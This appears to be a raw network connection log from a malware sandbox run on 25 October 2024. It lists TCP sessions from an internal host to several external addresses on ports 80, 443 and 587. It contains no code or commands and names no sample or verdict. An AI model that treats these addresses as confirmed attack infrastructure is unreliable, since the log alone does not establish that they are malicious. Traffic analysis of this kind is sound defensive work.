                                                                                                      Oct 25, 2024 09:18:10.374284983 CEST44349747188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.513518095 CEST44349747188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.513618946 CEST44349747188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.513767004 CEST49747443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.514668941 CEST49747443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.518594980 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.520155907 CEST4974980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.526607990 CEST8049742193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.526664972 CEST4974280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.527426004 CEST8049749193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.527504921 CEST4974980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.527626038 CEST4974980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.533080101 CEST8049749193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.754007101 CEST44349748188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.756170034 CEST49748443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.756217957 CEST44349748188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.896622896 CEST44349748188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.896848917 CEST44349748188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.897027969 CEST49748443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.897543907 CEST49748443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:10.901698112 CEST4974680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.902925968 CEST4975080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.907561064 CEST8049746193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.907723904 CEST4974680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.908224106 CEST8049750193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:10.908317089 CEST4975080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.908457041 CEST4975080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:10.913872004 CEST8049750193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.211352110 CEST8049749193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.213052034 CEST49751443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.213129997 CEST44349751188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.213210106 CEST49751443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.213512897 CEST49751443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.213531017 CEST44349751188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.264266968 CEST4974980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:11.696222067 CEST8049750193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.713490009 CEST49752443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.713540077 CEST44349752188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.713635921 CEST49752443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.722547054 CEST49752443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.722563028 CEST44349752188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.748816013 CEST4975080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:11.832118988 CEST44349751188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.856000900 CEST49751443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.856065035 CEST44349751188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.993748903 CEST44349751188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.993849039 CEST44349751188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:11.994008064 CEST49751443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.994729042 CEST49751443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:11.999795914 CEST4975380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.005369902 CEST8049753193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.005498886 CEST4975380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.005686998 CEST4975380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.011197090 CEST8049753193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.339420080 CEST44349752188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.341459036 CEST49752443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:12.341476917 CEST44349752188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.481333971 CEST44349752188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.481451035 CEST44349752188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.481563091 CEST49752443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:12.483849049 CEST49752443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:12.504054070 CEST4975080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.505954027 CEST4975480192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.509978056 CEST8049750193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.510054111 CEST4975080192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.511404991 CEST8049754193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:12.511523008 CEST4975480192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.511708975 CEST4975480192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:12.519828081 CEST8049754193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.136481047 CEST8049753193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.138569117 CEST49755443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.138622999 CEST44349755188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.138772964 CEST49755443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.139096975 CEST49755443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.139113903 CEST44349755188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.186389923 CEST4975380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:13.886181116 CEST8049754193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.888165951 CEST44349755188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.888520002 CEST49756443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.888583899 CEST44349756188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.888735056 CEST49756443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.889211893 CEST49756443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.889230013 CEST44349756188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.890403986 CEST49755443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:13.890438080 CEST44349755188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:13.936168909 CEST4975480192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.031276941 CEST44349755188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.031368017 CEST44349755188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.031424999 CEST49755443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:14.032077074 CEST49755443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:14.036794901 CEST4975380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.038033009 CEST4975780192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.042469025 CEST8049753193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.042526007 CEST4975380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.043390989 CEST8049757193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.043488026 CEST4975780192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.043553114 CEST4975780192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.049160004 CEST8049757193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.510190964 CEST44349756188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.512540102 CEST49756443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:14.512567997 CEST44349756188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.655163050 CEST44349756188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.655409098 CEST44349756188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.655483007 CEST49756443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:14.656070948 CEST49756443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:14.661170006 CEST4975480192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.662547112 CEST4975880192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.666908026 CEST8049754193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.666975021 CEST4975480192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.668035030 CEST8049758193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:14.668122053 CEST4975880192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.668287039 CEST4975880192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:14.673554897 CEST8049758193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.272080898 CEST8049757193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.273675919 CEST49759443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.273715019 CEST44349759188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.273796082 CEST49759443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.274236917 CEST49759443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.274254084 CEST44349759188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.326807022 CEST4975780192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:15.895344973 CEST44349759188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.897291899 CEST49759443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.897325993 CEST44349759188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.923504114 CEST8049758193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.925338030 CEST49761443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.925396919 CEST44349761188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.925587893 CEST49761443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.925951958 CEST49761443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:15.925971031 CEST44349761188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:15.967428923 CEST4975880192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.040745020 CEST44349759188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.040860891 CEST44349759188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.041002035 CEST49759443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.041501999 CEST49759443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.045756102 CEST4975780192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.046945095 CEST4976280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.051563025 CEST8049757193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.051748037 CEST4975780192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.052294970 CEST8049762193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.052366972 CEST4976280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.052448034 CEST4976280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.057847023 CEST8049762193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.567929983 CEST44349761188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.569463968 CEST49761443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.569509983 CEST44349761188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.714617014 CEST8049762193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.714864016 CEST44349761188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.714994907 CEST44349761188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.715132952 CEST49761443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.715744972 CEST49761443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.716196060 CEST49764443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.716300011 CEST44349764188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.717638016 CEST49764443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.718003988 CEST49764443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:16.718041897 CEST44349764188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.719335079 CEST4975880192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.720510006 CEST4976580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.724881887 CEST8049758193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.724960089 CEST4975880192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.725888968 CEST8049765193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.725970030 CEST4976580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.726078033 CEST4976580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:16.731455088 CEST8049765193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:16.764295101 CEST4976280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:17.328624010 CEST44349764188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.331309080 CEST49764443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:17.331365108 CEST44349764188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.449722052 CEST8049765193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.451167107 CEST49767443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:17.451212883 CEST44349767188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.451539040 CEST49767443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:17.451915979 CEST49767443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:17.451931953 CEST44349767188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.469527960 CEST44349764188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.469810009 CEST44349764188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.469885111 CEST49764443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:17.470319986 CEST49764443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:17.474756002 CEST4976280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:17.475948095 CEST4976980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:17.480422020 CEST8049762193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.480498075 CEST4976280192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:17.481295109 CEST8049769193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.481884003 CEST4976980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:17.481931925 CEST4976980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:17.487421036 CEST8049769193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:17.498675108 CEST4976580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:18.067291975 CEST44349767188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.076051950 CEST49767443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:18.076093912 CEST44349767188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.216337919 CEST44349767188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.216447115 CEST44349767188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.216547012 CEST49767443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:18.217067957 CEST49767443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:18.293267012 CEST4976580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:18.299062014 CEST8049765193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.299160004 CEST4976580192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:18.301734924 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:18.301781893 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.301979065 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:18.302445889 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:18.302462101 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.420723915 CEST8049769193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.421885014 CEST49771443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:18.421942949 CEST44349771188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.422019005 CEST49771443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:18.422271967 CEST49771443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:18.422286034 CEST44349771188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.467443943 CEST4976980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:19.028848886 CEST44349771188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.039529085 CEST49771443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:19.039560080 CEST44349771188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.155442953 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.155560970 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:19.159368038 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:19.159375906 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.159779072 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.171037912 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:19.178901911 CEST44349771188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.179131031 CEST44349771188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.179200888 CEST49771443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:19.179507017 CEST49771443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:19.182806969 CEST4976980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:19.184010029 CEST4977380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:19.188570976 CEST8049769193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.188631058 CEST4976980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:19.189356089 CEST8049773193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.189424992 CEST4977380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:19.189542055 CEST4977380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:19.194838047 CEST8049773193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.215329885 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.405200005 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.405289888 CEST44349770149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:19.405441046 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:19.434673071 CEST49770443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:20.888344049 CEST8049773193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:20.915446043 CEST49775443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:20.915487051 CEST44349775188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:20.915549994 CEST49775443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:20.916049004 CEST49775443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:20.916064024 CEST44349775188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:20.936280012 CEST4977380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:21.536921024 CEST44349775188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:21.549566031 CEST49775443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:21.549607992 CEST44349775188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:21.689636946 CEST44349775188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:21.689740896 CEST44349775188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:21.689857006 CEST49775443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:21.690551043 CEST49775443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:21.694411993 CEST4977380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:21.694940090 CEST4977680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:21.700973988 CEST8049773193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:21.701072931 CEST4977380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:21.701430082 CEST8049776193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:21.701530933 CEST4977680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:21.701718092 CEST4977680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:21.707283974 CEST8049776193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:22.365217924 CEST8049776193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:22.367127895 CEST49777443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:22.367157936 CEST44349777188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:22.367252111 CEST49777443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:22.367595911 CEST49777443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:22.367607117 CEST44349777188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:22.420686960 CEST4977680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:22.978107929 CEST44349777188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:22.980201006 CEST49777443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:22.980227947 CEST44349777188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:23.124188900 CEST44349777188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:23.124444008 CEST44349777188.114.97.3192.168.2.4
                                                                                                      Oct 25, 2024 09:18:23.124531031 CEST49777443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:23.125132084 CEST49777443192.168.2.4188.114.97.3
                                                                                                      Oct 25, 2024 09:18:23.137742996 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:23.137789965 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:23.137907028 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:23.138448000 CEST4977680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:23.138514042 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:23.138530970 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:23.144227982 CEST8049776193.122.130.0192.168.2.4
                                                                                                      Oct 25, 2024 09:18:23.144340038 CEST4977680192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:24.014157057 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.014355898 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:24.016463995 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:24.016474962 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.016901970 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.018351078 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:24.063340902 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.258903980 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.258981943 CEST44349778149.154.167.220192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.259032965 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:24.261940956 CEST49778443192.168.2.4149.154.167.220
                                                                                                      Oct 25, 2024 09:18:25.608916044 CEST4974380192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:25.609306097 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:25.614990950 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:25.615115881 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.238082886 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.239008904 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.246808052 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.403197050 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.403522015 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.408977985 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.571563959 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.572483063 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.578128099 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.929665089 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.929755926 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.929792881 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.929795980 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.929811001 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.929821014 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:26.929850101 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.929862976 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.943955898 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:26.949491978 CEST58749779104.243.33.38192.168.2.4
